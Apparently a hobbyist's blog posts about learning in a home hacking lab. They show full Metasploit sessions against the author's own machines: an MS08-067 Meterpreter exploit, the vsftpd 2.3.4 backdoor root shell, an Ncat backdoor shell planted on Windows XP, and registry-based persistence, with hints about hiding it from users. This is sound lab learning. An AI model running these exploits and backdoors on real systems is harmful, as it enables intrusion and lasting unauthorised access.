To start with I wanted to run some of the Ruby example files files in Racket, but we have to make sure we’re in the RVM environment first:

source /usr/local/rvm/scripts/rvm

And then navigate to the correct folder:

cd /usr/local/rvm/gems/ruby-1.8.7-p374/gems/racket-1.0.11/examples

And then run the example file:

ruby arp-send

Output

Usage: arp-send <interface> <opcode>

So I know it’s working.

Then to run Ruby Racket proper:

source /usr/local/rvm/scripts/rvm
rvm use 1.8.7
irb
require ‘rubygems’
require ‘racket’

And we’re ready to code instruction for Racket in the Interavtive Ruby Shell

That’s as far as I’ve got. I now need to learn Racket and hope in the meantime it remains stable.

Armitage is Metasploit’s GUI and although you can find instructions on installing this on Kali Linux, for me, it was no more difficult than running an Metasploit update (msfupdate) and requesting armitage in the Terminal.

A pop-up box appeared with: Host 127.0.0.1 – Port 55553 – User msf – Pass test and I selected “connect”. Another pop-up box entitled “Start Metasploit” with “A Metasploit RPC server is not running or not accepting connects yet. Would you like me to start Metasploit’s RPC server for you?” and I selected “yes”.

Once opened I selected Hosts >> Add hosts and gave the pop-up box the IP of my Ununtu system running Security Onion. Once the computer screen with IP address image appeared in the “Target” panel, I simply right-clicked and selected scan.

I must admit, having spent the last six months in the Command Prompt this was a joy.

I checked out the Security Onion IDS and was surprised to note this was not detected by Snorby; however, it was in Sguil as represented by the Squert output:

Note the Yellow coloured bar indicates “reconnaissance” which of course this scan is.

I have a sneaking suspicion that Amitage is going to be very good fun indeed.

Back from holiday and managed to get my hands on an excellent cheap Dell laptop and a Dualcomm Network tap.

I loaded the full Security Onion suite (Xubuntu 12.04 64-bit) on the Dell laptop and rigged the network tap to mirror the router and pump all the data to the laptop. To check it was working I opened Wireshark which confirmed every single packet flowing in and out of the router was being captured.

With Security Onion configured and Snorby and Squert up and running I went off and launched Metasploit Armitage exploits from another laptop against my Windows XP hacking lab.

It was satisfying to see this activity picked up in both Squert and Snorby:

The attacking IP was 192.168.70 and the target 192.168.1.79.

I’m delighted all of this has proved to function as expected. I just need to learn the ins and outs of metasploit Armitage as I still haven’t managed to compromise my extremely vulnerable, unpatched and unprotected Windows XP system. Interestingly, Security Onion revealed some other “High Severity” intrusion activity on this XP system which has not been instigated by me:

As you can see if would seem that somebody/something else has taken advantage of the deliberately vulnerable state of the hacking lab. I don’t know what all of this “Google Talk/Jabber” is about but I will look into it out of interest and investigate the IP address.

Of course. do let me know if you’ve heard of this type of intrusion.

I just completed my first successful exploit in the marvellous Metasploit GUI Armitage.

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First up, I added the “Host” which is the target IP address.

Then right clicked the “Host” and performed the scan, which is a bundle of inbuilt Metasploit scans (ftp, smtp, http, smb_versions), each gleaning information on the target.

Note the “Host” terminal image now bears the Windows logo as the detected operating system during the scan.

Then up to the toolbar Attacks >> Find attacks.

Once complete we can right-click the “Host” and select “Attack” which gives us a list of potential exploits.

At this point I cheated as my very first command prompt Metasploit exploit on this target machine was via “exploit/windows/smb/ms08_067_netapi” so I simply selected this from “smb” in the dropdown list.

But first I checked the exploit:

So I launched the attack and within a few seconds the “Host” terminal image changed:

The red terminal with electrical jolts indicates a compromised target.

Here’s the Output of the process:

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 20855
LPORT => 20855
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:57239 -> 192.168.1.79:20855) at 2013-09-02 18:27:27 +0100

meterpreter >

As you can see I have obtained an Meterpreter shell.

Right-clicking on the “Host” image now gives me “Meterpreter” in the dropdown with every conceivable option available at the click of a finger.

Metasploit Armitage is a fabulous tool.

Next time I’ll look to compromise an Ubuntu system that I’ve never exploited before.

Just found out than an update version of Kali Linux has been released with a few more bits and bobs

To upgrade:

root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

At the moment I’m studying Ruby, preparing for a course and buzzing on Ncat and its uses as a backdoor among other things. I did look at Netcat, but want to be able to use Proxychains which is reportedly easier with Ncat.

I will probably attempt to upload a portable Windows Ncat.exe file on to a compromised Windows system via Metasploit and play around with connecting to it.

I’ll blog it if I do.

First I exploited my Windows system with Metasploit Armitage obtaining a Meterpreter shell as per this post.

Then I needed to upload the ncat.exe file (which I download from here) to the target machine. In Armitage this is a breeze. Simply right-click the compromised terminal: >> Meterpreter1 >> Explore >> Browse Files. This give you a nice list of files on the exploited machine:

Notice the “Upload” button from which we transfer files over on to the target system. Once complete you can refresh and check your file is indeed within the C:\WINDOWS\system32 directory. Once found right-click the file and “Execute” which brings up the “Input Arguments” box:

As you can see I entered -l (listen) 23 (port) -e (execute) cmd (command shell)

I then opened a Terminal on the attacking machine and attempted to connect with Ncat on the the target machine:

~# ncat 192.168.1.79 23 <– Input target IP and specified port

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And as you can see this connection was successful. I can now close Metasploit and continue with this connection.

It’s worth noting that the -e command has an implicit “keep alive” element which means that Ncat stays up and running even after the connection is terminated.

It’s also worth noting that this is a non-persistent connection in that once the target machine is rebooted the connection is no longer available without executing the Ncat listener. This can be overcome through ensuring the Ncat.exe program is executed on start-up.

I’ll try to blog the solution to this and also create a reverse connection.

I couldn’t figure out how to do this in Armitage and so had to resort to the good ol’ Terminal.

I exploited the XP system as per this post and obtained an Meterpreter shell.

First to upload the Ncat.exe file to the target machine:

meterpreter > upload ncat.exe c:windowssystem32
[*] uploading : ncat.exe -> c:windowssystem32
[*] uploaded : ncat.exe -> c:windowssystem32ncat.exe
meterpreter >

Next we need to get Ncat to execute on startup so we manipulate the Windows Registry:

Sorry the above is an image, pasting in the code messed up WordPress.

Note the -l (listen) 5777 (port number) arguments are set at this point.

We can double check our program is in the registry:

meterpreter > reg enumkey -k HKLMsoftwaremicrosoftwindowscurrentversionrun
Enumerating: HKLMsoftwaremicrosoftwindowscurrentversionrun

Values (5):

VMware hqtray
TgZcTlqTJNmSbP
TIOzUGrTHgMzS
zmvSLZpTksgWih
ncat

meterpreter >

As we can see Ncat is included

Now to reboot the target XP machine and see if we can establish a connection:

# ncat 192.168.1.79 5777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsLab1>

Voilà

Two issues to note.

Firstly a dirty great big command box is opened on startup which if the user closes, terminates our connection.

Secondly, I haven’t dealt with any tricky firewall issues that may prevent the inbound connection.

However, as a proof of concept, it works perfectly and I’m sure there are ways to prevent the command box opening so that the Ncat program runs without alerting the user.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4

In the Metasploit console:

msf > search vsftpd

Matching Modules
================

Name                                  Disclosure Date          Rank       Description
—-                                  —————          —-       ———–
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution

Then:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

Name               Disclosure Date  Rank    Description
—-               —————  —-    ———–
cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                   yes       The target address
RPORT  21               yes       The target port

Exploit target:

Id  Name
–  —-
0   Automatic

And to the exploit:

msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling…
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.78:39930 -> 192.168.1.103:6200) at 2013-11-02 10:15:45 +0000

And to prove exploit:

whoami
root
Root access obtained.

This exploit is based is based on a backdoor that was slipped into the source code of the vsftpd server version 2.3.4 which opens a listening shell on port 6200 when a smiley face is used in the FTP Username.

Now that we know the vulnerability we can exploit this using a different method within the command prompt. First we make a connection via ftp:

:~# ftp 192.168.1.103
Connected to 192.168.1.103.
220 (vsFTPd 2.3.4)
Name (192.168.1.103:root): whatever:)
331 Please specify the password.
Password:

We can use any password.

Then connect via Ncat:

:~# ncat 192.168.1.103 6200
whoami
root

Here’s a Security Tube video demonstrating the above. It’s worth viewing the Security Tube page which details the injected backdoor code.

And here’s another video using Netcat: